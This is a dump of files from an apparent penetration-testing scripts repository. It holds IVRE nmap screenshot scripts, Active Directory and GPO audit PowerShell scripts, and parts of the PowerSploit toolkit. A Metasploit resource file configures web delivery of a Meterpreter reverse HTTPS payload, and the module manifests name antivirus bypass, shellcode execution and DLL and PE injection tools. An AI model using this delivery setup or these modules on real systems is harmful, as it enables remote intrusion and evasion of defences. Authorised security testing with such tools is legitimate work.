SERVICE 51 | -- 80/tcp open http 52 | -- |_http-screenshot: Saved to screenshot-173.194.45.82-www.google.com-80.jpg 53 | 54 | portrule = shortport.http 55 | 56 | local function get_hostname(host) 57 | local arg = stdnse.get_script_args(SCRIPT_NAME .. '.vhost') 58 | return arg or host.targetname or host.ip 59 | end 60 | 61 | action = function(host, port) 62 | local timeout = tonumber(stdnse.get_script_args(SCRIPT_NAME .. '.timeout')) or 300 63 | local ssl = port.version.service_tunnel == "ssl" 64 | local port = port.number 65 | local fname, strport 66 | local hostname = get_hostname(host) 67 | if hostname == host.ip then 68 | fname = string.format("screenshot-%s-%d.jpg", host.ip, port) 69 | else 70 | fname = string.format("screenshot-%s-%s-%d.jpg", host.ip, hostname, port) 71 | end 72 | if (port == 80 and not ssl) or (port == 443 and ssl) then 73 | strport = "" 74 | else 75 | strport = string.format(":%d", port) 76 | end 77 | os.execute(string.format("ivre-http-screenshot.js %s://%s%s %s %d>/dev/null 2>&1", 78 | ssl and "https" or "http", hostname, strport, 79 | fname, timeout)) 80 | return (os.rename(fname, fname) 81 | and string.format("Saved to %s", fname) 82 | or "Failed") 83 | end 84 | -------------------------------------------------------------------------------- /nse/x11-screenshot.nse: -------------------------------------------------------------------------------- 1 | -- This file is part of IVRE. 2 | -- Copyright 2011 - 2016 Pierre LALET 3 | -- 4 | -- IVRE is free software: you can redistribute it and/or modify it 5 | -- under the terms of the GNU General Public License as published by 6 | -- the Free Software Foundation, either version 3 of the License, or 7 | -- (at your option) any later version. 8 | -- 9 | -- IVRE is distributed in the hope that it will be useful, but WITHOUT 10 | -- ANY WARRANTY; without even the implied warranty of MERCHANTABILITY 11 | -- or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public 12 | -- License for more details. 13 | -- 14 | -- You should have received a copy of the GNU General Public License 15 | -- along with IVRE. If not, see . 16 | 17 | local stdnse = require "stdnse" 18 | 19 | description = [[ 20 | 21 | Gets a screenshot from an X11 server using `convert`. 22 | 23 | Imagemagick's `import` tool must me installed somewhere in $PATH. 24 | 25 | ]] 26 | 27 | author = "Pierre Lalet" 28 | license = "GPLv3" 29 | categories = {"discovery", "safe", "screenshot"} 30 | 31 | --- 32 | -- @usage 33 | -- nmap -n -p 6000 --script x11-screenshot 1.2.3.4 34 | -- 35 | -- @args x11-screenshot.timeout timeout for the import process 36 | -- (default: 600s) 37 | -- 38 | -- @output 39 | -- PORT STATE SERVICE 40 | -- 6000/tcp open X11 41 | -- |_x11-screenshot: Saved to screenshot-1.2.3.4-6000.jpg 42 | 43 | local function sh_timeout(cmd, timeout) 44 | return ("%s & CPID=${!}; (sleep %d; kill -9 ${CPID}) & SPID=${!}; wait ${CPID} 2>/dev/null; kill -9 ${SPID} 2>/dev/null"):format(cmd, timeout) 45 | end 46 | 47 | 48 | portrule = function(host, port) 49 | return (port.number >= 6000 and port.number <= 6019) 50 | or (port.service and port.service:match("^X11")) 51 | end 52 | 53 | 54 | action = function(host, port) 55 | local fname = ("screenshot-%s-%d.jpg"):format(host.ip, port.number) 56 | local timeout = tonumber(stdnse.get_script_args(SCRIPT_NAME .. '.timeout')) or 600 57 | os.execute(sh_timeout(("import -silent -window root -display %s:%d %s"):format( 58 | host.ip, port.number - 6000, fname), timeout)) 59 | if os.rename(fname, fname) then 60 | return ("Saved to %s"):format(fname) 61 | end 62 | end 63 | -------------------------------------------------------------------------------- /powershell/AD_user_security_report.ps1: -------------------------------------------------------------------------------- 1 | import-module activedirectory 2 | 3 | $users = Get-ADUser -filter * -Properties * | Select SamAccountName,SurName,GivenName,Description,PasswordExpired,PasswordLastSet,AccountLockoutTime,AccountExpirationDate,LastLogonDate,@{name="MemberOf";expression={$_.memberof -join ";"}} | ConvertTo-Html 4 | 5 | #HTML Heading 6 | $htmlhead = @" 7 | 8 | Active Directory User Security Audit Report 9 | 10 | 11 | "@ 12 | 13 | #HTML Body for report 14 | $htmlbody = @" 15 | 16 |
17 | Active Directory User Security Audit Report
18 | User Audit Report
19 | $dated
20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 |
User Audit Security Report
$users
28 |
29 | 30 | "@ 31 | #Date for file name variable 32 | $fileDate = get-date -uformat %Y-%m-%d 33 | #Report output & location 34 | ConvertTo-HTML -head $htmlhead -body $htmlbody | Out-File ADUserSecurityAuditReport-$fileDate.html -------------------------------------------------------------------------------- /powershell/GPOReports.ps1: -------------------------------------------------------------------------------- 1 | #GPOReports.ps1 2 | #Create GPO reports 3 | #alan dot kaplan at va dot gov 4 | #6-10-2013 5 | 6 | Import-Module activedirectory 7 | [void][System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic') 8 | 9 | $domain = [Microsoft.VisualBasic.Interaction]::InputBox("Report GPOs in what domain?", "Domain", "$env:userdnsdomain") 10 | if ($domain.Length -eq 0) {Exit} 11 | 12 | $ReportPath = [Microsoft.VisualBasic.Interaction]::InputBox("Write reports to what path?", ` 13 | "Path", "$env:userprofile" +'\desktop\' + $domain + ' GPO Reports' ) 14 | if ($reportpath.Length -eq 0) {Exit} 15 | 16 | # if folder does not exist... 17 | if (!(Test-Path $ReportPath)) { 18 | # create it 19 | [void](new-item $ReportPath -itemType directory) 20 | } 21 | 22 | 23 | $FilteredList = Get-GPO -All -Domain $domain ` 24 | |Select-Object -Property DisplayName,Owner, GPOStatus,ID ` 25 | |Out-GridView -OutputMode Multiple -Title "Wait for List, then select GPOs to report and click OK" 26 | 27 | #variation of code at 28 | #http://proproit.com/group-policy/the-simplest-way-to-get-group-policy-objects-reports/ 29 | #using 2.0 syntax 30 | 31 | $FilteredList | foreach ` 32 | { 33 | $Name = $_.DisplayName; 34 | Write-Host Writing GPO Report for $name to $reportpath\$name.html 35 | Get-GPOReport $_.id -ReportType HTML -Domain $domain -Path $reportpath\$name.html 36 | } 37 | -------------------------------------------------------------------------------- /powershell/Invoke-MetasploitPayload/LICENSE: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (c) 2016 Jared Haight 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /powershell/Invoke-MetasploitPayload/invoke-metasploitpayload.rc: -------------------------------------------------------------------------------- 1 | use exploit/multi/script/web_delivery 2 | set SRVHOST 0.0.0.0 3 | set SRVPORT 8443 4 | set SSL true 5 | set target 2 6 | set payload windows/meterpreter/reverse_https 7 | set LHOST 0.0.0.0 8 | set LPORT 443 9 | run -j -------------------------------------------------------------------------------- /powershell/Invoke-MetasploitPayload/web_delivery_screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/isaudits/scripts/9785abda7485c304c5ef452a8bf4068269d1d769/powershell/Invoke-MetasploitPayload/web_delivery_screenshot.png -------------------------------------------------------------------------------- /powershell/New-ADAssetReport.ps1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/isaudits/scripts/9785abda7485c304c5ef452a8bf4068269d1d769/powershell/New-ADAssetReport.ps1 -------------------------------------------------------------------------------- /powershell/PowerSploit/AntivirusBypass/AntivirusBypass.psd1: -------------------------------------------------------------------------------- 1 | @{ 2 | 3 | # Script module or binary module file associated with this manifest. 4 | ModuleToProcess = 'AntivirusBypass.psm1' 5 | 6 | # Version number of this module. 7 | ModuleVersion = '3.0.0.0' 8 | 9 | # ID used to uniquely identify this module 10 | GUID = '7cf9de61-2bfc-41b4-a397-9d7cf3a8e66b' 11 | 12 | # Author of this module 13 | Author = 'Matthew Graeber' 14 | 15 | # Copyright statement for this module 16 | Copyright = 'BSD 3-Clause' 17 | 18 | # Description of the functionality provided by this module 19 | Description = 'PowerSploit Antivirus Avoidance/Bypass Module' 20 | 21 | # Minimum version of the Windows PowerShell engine required by this module 22 | PowerShellVersion = '2.0' 23 | 24 | # Functions to export from this module 25 | FunctionsToExport = '*' 26 | 27 | # List of all files packaged with this module 28 | FileList = 'AntivirusBypass.psm1', 'AntivirusBypass.psd1', 'Find-AVSignature.ps1', 'Usage.md' 29 | 30 | } 31 | -------------------------------------------------------------------------------- /powershell/PowerSploit/AntivirusBypass/AntivirusBypass.psm1: -------------------------------------------------------------------------------- 1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName} 2 | -------------------------------------------------------------------------------- /powershell/PowerSploit/AntivirusBypass/Usage.md: -------------------------------------------------------------------------------- 1 | To install this module, drop the entire AntivirusBypass folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable. 2 | 3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules" 4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules" 5 | 6 | To use the module, type `Import-Module AntivirusBypass` 7 | 8 | To see the commands imported, type `Get-Command -Module AntivirusBypass` 9 | 10 | For help on each individual command, Get-Help is your friend. 11 | 12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability. -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/CodeExecution.psd1: -------------------------------------------------------------------------------- 1 | @{ 2 | 3 | # Script module or binary module file associated with this manifest. 4 | ModuleToProcess = 'CodeExecution.psm1' 5 | 6 | # Version number of this module. 7 | ModuleVersion = '3.0.0.0' 8 | 9 | # ID used to uniquely identify this module 10 | GUID = 'a8a6780b-e694-4aa4-b28d-646afa66733c' 11 | 12 | # Author of this module 13 | Author = 'Matthew Graeber' 14 | 15 | # Company or vendor of this module 16 | CompanyName = '' 17 | 18 | # Copyright statement for this module 19 | Copyright = 'BSD 3-Clause' 20 | 21 | # Description of the functionality provided by this module 22 | Description = 'PowerSploit Code Execution Module' 23 | 24 | # Minimum version of the Windows PowerShell engine required by this module 25 | PowerShellVersion = '2.0' 26 | 27 | # Functions to export from this module 28 | FunctionsToExport = '*' 29 | 30 | # List of all files packaged with this module 31 | FileList = 'CodeExecution.psm1', 'CodeExecution.psd1', 'Invoke-Shellcode.ps1', 'Invoke-DllInjection.ps1', 32 | 'Invoke-ReflectivePEInjection.ps1', 'Invoke-WmiCommand.ps1', 'Usage.md' 33 | } 34 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/CodeExecution.psm1: -------------------------------------------------------------------------------- 1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName} 2 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 11.00 3 | # Visual Studio 2010 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoDLL", "DemoDLL\DemoDLL.vcxproj", "{F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Win32 = Debug|Win32 9 | Debug|x64 = Debug|x64 10 | Release|Win32 = Release|Win32 11 | Release|x64 = Release|x64 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|Win32.ActiveCfg = Debug|Win32 15 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|Win32.Build.0 = Debug|Win32 16 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|x64.ActiveCfg = Debug|x64 17 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|x64.Build.0 = Debug|x64 18 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|Win32.ActiveCfg = Release|Win32 19 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|Win32.Build.0 = Release|Win32 20 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|x64.ActiveCfg = Release|x64 21 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|x64.Build.0 = Release|x64 22 | EndGlobalSection 23 | GlobalSection(SolutionProperties) = preSolution 24 | HideSolutionNode = FALSE 25 | EndGlobalSection 26 | EndGlobal 27 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.cpp: -------------------------------------------------------------------------------- 1 | // DemoDLL.cpp : Defines the exported functions for the DLL application. 2 | // 3 | 4 | #include "stdafx.h" 5 | #include "DemoDLL.h" 6 | 7 | using namespace std; 8 | 9 | 10 | extern "C" __declspec( dllexport ) char* StringFunc() 11 | { 12 | ostream *outputStream = NULL; 13 | 14 | //If you want to output to cout, simply set outputStream to &cout. This allows you to write a program that can switch between outputting to string or to cout. 15 | //outputStream = &cout; 16 | 17 | ostringstream *stringStream = new ostringstream(); 18 | outputStream = stringStream; 19 | 20 | (*outputStream) << "String DLL function is working" << endl << endl; 21 | 22 | string output = (*stringStream).str(); 23 | const char* outputStr = output.c_str(); 24 | 25 | char* out = new char[output.size()+1]; 26 | strcpy(out, outputStr); 27 | out[output.size()] = '\0'; 28 | 29 | 30 | return out; 31 | } 32 | 33 | extern "C" __declspec( dllexport ) void VoidFunc() 34 | { 35 | printf("Void DLL function is working, using printf to display. You will only see this if you run locally.\n\n"); 36 | return; 37 | } 38 | 39 | extern "C" __declspec( dllexport ) wchar_t* WStringFunc() 40 | { 41 | wostream *outputStream = NULL; 42 | 43 | //If you want to output to wcout, simply set outputStream to &cout. This allows you to write a program that can switch between outputting to wstring or to wcout. 44 | outputStream = &wcout; 45 | 46 | wostringstream *stringStream = new wostringstream(); 47 | outputStream = stringStream; 48 | 49 | (*outputStream) << L"WString DLL function is working" << endl << endl; 50 | 51 | wstring output = (*stringStream).str(); 52 | const wchar_t* outputStr = output.c_str(); 53 | 54 | wchar_t* out = new wchar_t[output.size()+1]; 55 | wcscpy(out, outputStr); 56 | out[output.size()] = '\0'; 57 | 58 | 59 | return out; 60 | } -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.h: -------------------------------------------------------------------------------- 1 | // The following ifdef block is the standard way of creating macros which make exporting 2 | // from a DLL simpler. All files within this DLL are compiled with the DEMODLL_EXPORTS 3 | // symbol defined on the command line. This symbol should not be defined on any project 4 | // that uses this DLL. This way any other project whose source files include this file see 5 | // DEMODLL_API functions as being imported from a DLL, whereas this DLL sees symbols 6 | // defined with this macro as being exported. 7 | #ifdef DEMODLL_EXPORTS 8 | #define DEMODLL_API __declspec(dllexport) 9 | #else 10 | #define DEMODLL_API __declspec(dllimport) 11 | #endif 12 | 13 | using namespace std; 14 | 15 | extern "C" __declspec( dllexport ) char* StringFunc(); 16 | extern "C" __declspec( dllexport ) void VoidFunc(); 17 | extern "C" __declspec( dllexport ) wchar_t* WStringFunc(); -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | Header Files 29 | 30 | 31 | 32 | 33 | Source Files 34 | 35 | 36 | Source Files 37 | 38 | 39 | Source Files 40 | 41 | 42 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | DYNAMIC LINK LIBRARY : DemoDLL Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this DemoDLL DLL for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your DemoDLL application. 9 | 10 | 11 | DemoDLL.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | DemoDLL.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | DemoDLL.cpp 25 | This is the main DLL source file. 26 | 27 | ///////////////////////////////////////////////////////////////////////////// 28 | Other standard files: 29 | 30 | StdAfx.h, StdAfx.cpp 31 | These files are used to build a precompiled header (PCH) file 32 | named DemoDLL.pch and a precompiled types file named StdAfx.obj. 33 | 34 | ///////////////////////////////////////////////////////////////////////////// 35 | Other notes: 36 | 37 | AppWizard uses "TODO:" comments to indicate parts of the source code you 38 | should add to or customize. 39 | 40 | ///////////////////////////////////////////////////////////////////////////// 41 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/dllmain.cpp: -------------------------------------------------------------------------------- 1 | // dllmain.cpp : Defines the entry point for the DLL application. 2 | #include "stdafx.h" 3 | 4 | BOOL APIENTRY DllMain( HMODULE hModule, 5 | DWORD ul_reason_for_call, 6 | LPVOID lpReserved 7 | ) 8 | { 9 | switch (ul_reason_for_call) 10 | { 11 | case DLL_PROCESS_ATTACH: 12 | case DLL_THREAD_ATTACH: 13 | case DLL_THREAD_DETACH: 14 | case DLL_PROCESS_DETACH: 15 | break; 16 | } 17 | return TRUE; 18 | } 19 | 20 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // DemoDLL.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 11 | // Windows Header Files: 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | 18 | 19 | 20 | // TODO: reference additional headers your program requires here 21 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 2012 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoDLL_RemoteProcess", "DemoDLL_RemoteProcess\DemoDLL_RemoteProcess.vcxproj", "{3C031A7E-A99B-465E-ADF0-1350A94F1F5D}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Win32 = Debug|Win32 9 | Debug|x64 = Debug|x64 10 | Release|Win32 = Release|Win32 11 | Release|x64 = Release|x64 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|Win32.ActiveCfg = Debug|Win32 15 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|Win32.Build.0 = Debug|Win32 16 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|x64.ActiveCfg = Debug|x64 17 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|x64.Build.0 = Debug|x64 18 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|Win32.ActiveCfg = Release|Win32 19 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|Win32.Build.0 = Release|Win32 20 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|x64.ActiveCfg = Release|x64 21 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|x64.Build.0 = Release|x64 22 | EndGlobalSection 23 | GlobalSection(SolutionProperties) = preSolution 24 | HideSolutionNode = FALSE 25 | EndGlobalSection 26 | EndGlobal 27 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.cpp: -------------------------------------------------------------------------------- 1 | // DemoDLL_RemoteProcess.cpp : Defines the exported functions for the DLL application. 2 | // 3 | 4 | #include "stdafx.h" 5 | 6 | using namespace std; 7 | 8 | extern "C" __declspec( dllexport ) void VoidFunc(); 9 | 10 | 11 | extern "C" __declspec( dllexport ) void VoidFunc() 12 | { 13 | ofstream myfile; 14 | _mkdir("c:\\ReflectiveLoaderTest"); 15 | myfile.open ("c:\\ReflectiveLoaderTest\\DllVoidFunction.txt"); 16 | myfile << "Dll Void function successfully called.\n"; 17 | myfile.close(); 18 | return; 19 | } -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | 29 | 30 | Source Files 31 | 32 | 33 | Source Files 34 | 35 | 36 | Source Files 37 | 38 | 39 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | DYNAMIC LINK LIBRARY : DemoDLL_RemoteProcess Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this DemoDLL_RemoteProcess DLL for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your DemoDLL_RemoteProcess application. 9 | 10 | 11 | DemoDLL_RemoteProcess.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | DemoDLL_RemoteProcess.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | DemoDLL_RemoteProcess.cpp 25 | This is the main DLL source file. 26 | 27 | When created, this DLL does not export any symbols. As a result, it 28 | will not produce a .lib file when it is built. If you wish this project 29 | to be a project dependency of some other project, you will either need to 30 | add code to export some symbols from the DLL so that an export library 31 | will be produced, or you can set the Ignore Input Library property to Yes 32 | on the General propert page of the Linker folder in the project's Property 33 | Pages dialog box. 34 | 35 | ///////////////////////////////////////////////////////////////////////////// 36 | Other standard files: 37 | 38 | StdAfx.h, StdAfx.cpp 39 | These files are used to build a precompiled header (PCH) file 40 | named DemoDLL_RemoteProcess.pch and a precompiled types file named StdAfx.obj. 41 | 42 | ///////////////////////////////////////////////////////////////////////////// 43 | Other notes: 44 | 45 | AppWizard uses "TODO:" comments to indicate parts of the source code you 46 | should add to or customize. 47 | 48 | ///////////////////////////////////////////////////////////////////////////// 49 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/dllmain.cpp: -------------------------------------------------------------------------------- 1 | // dllmain.cpp : Defines the entry point for the DLL application. 2 | #include "stdafx.h" 3 | 4 | using namespace std; 5 | 6 | BOOL APIENTRY DllMain( HMODULE hModule, 7 | DWORD ul_reason_for_call, 8 | LPVOID lpReserved 9 | ) 10 | { 11 | ofstream myfile; 12 | 13 | switch (ul_reason_for_call) 14 | { 15 | case DLL_PROCESS_ATTACH: 16 | _mkdir("c:\\ReflectiveLoaderTest"); 17 | myfile.open ("c:\\ReflectiveLoaderTest\\DllMain.txt"); 18 | myfile << "DllMain successfully called.\n"; 19 | myfile.close(); 20 | break; 21 | case DLL_THREAD_ATTACH: 22 | case DLL_THREAD_DETACH: 23 | case DLL_PROCESS_DETACH: 24 | break; 25 | } 26 | return TRUE; 27 | } 28 | 29 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/stdafx.cpp: -------------------------------------------------------------------------------- 1 | // stdafx.cpp : source file that includes just the standard includes 2 | // DemoDLL_RemoteProcess.pch will be the pre-compiled header 3 | // stdafx.obj will contain the pre-compiled type information 4 | 5 | #include "stdafx.h" 6 | 7 | // TODO: reference any additional headers you need in STDAFX.H 8 | // and not in this file 9 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/stdafx.h: -------------------------------------------------------------------------------- 1 | // stdafx.h : include file for standard system include files, 2 | // or project specific include files that are used frequently, but 3 | // are changed infrequently 4 | // 5 | 6 | #pragma once 7 | 8 | #include "targetver.h" 9 | 10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers 11 | // Windows Header Files: 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | 18 | 19 | // TODO: reference additional headers your program requires here 20 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/targetver.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /powershell/PowerSploit/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 2012 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoExe_MD", "DemoExe_MD\DemoExe_MD.vcxproj", "{F674A5CE-F75F-4035-90AB-46DEBC670282}" 5 | EndProject 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoExe_MDd", "DemoExe_MDd\DemoExe_MDd.vcxproj", "{18FA8A49-4663-4FD8-9F0B-BD489A385A7B}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Win32 = Debug|Win32 11 | Debug|x64 = Debug|x64 12 | Release|Win32 = Release|Win32 13 | Release|x64 = Release|x64 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | 